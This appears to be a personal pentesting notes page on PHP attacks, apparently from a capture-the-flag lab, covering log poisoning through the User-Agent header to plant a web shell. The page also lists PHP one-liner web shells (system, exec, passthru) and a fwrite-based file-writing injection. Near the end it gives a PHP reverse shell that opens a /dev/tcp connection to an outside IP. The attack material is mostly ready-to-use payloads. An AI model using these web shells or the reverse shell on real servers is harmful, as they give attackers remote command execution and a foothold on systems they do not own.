php hacks

reverse shell github repository:

GitHub - ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Windows OS.GitHub

<?php system($ REQUEST['cmd']); ?>

It looks like it's logging everytime someone visits the log.php

if we change the useragent to malicious code, we can execute?

<?php system($ REQUEST['cmd']); ?>

successfully executed

By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything)

changed useragent to the php code
changed file name to cmd.php in GET

now we can go to http://internal-01.bart.htb/log/cmd.php?cmd=whoami to execute it

now we can do reverse shell!

----

test php

<?php 
echo("Gorigorisensei Hacking your System.") ;
?>

Another case:

code=fwrite(fopen('shell.php','w'),'<?php echo exec($_GET["cmd"]);?>');
Logical Flows 
Creating a file (write it) 
fwrite(fopen('shell.php','w')
2. put the command in it so it will be executed when we visit /shell.php?cmd=whoami
'<?php echo exec($_GET["cmd"]);?>');
since it didn't like having the single quotation mark when I used exec($_GET['cmd'])
other php one liners 
POST didn't work since it's already creating a file for us in the first command.

Other one liners to try:

<?php echo passthru($_GET['cmd']); ?>

<?php echo exec($_POST['cmd']); ?>

<?php system($_GET['cmd']); ?>

<?php passthru($_REQUEST['cmd']); ?>

<?php echo system("0<&196;exec 196<>/dev/tcp/192.168.119.212/443; sh <&196 >&196 2>&196"); ?>

PreviousPort Swigger SQL Nextphp

Last updated 1 year ago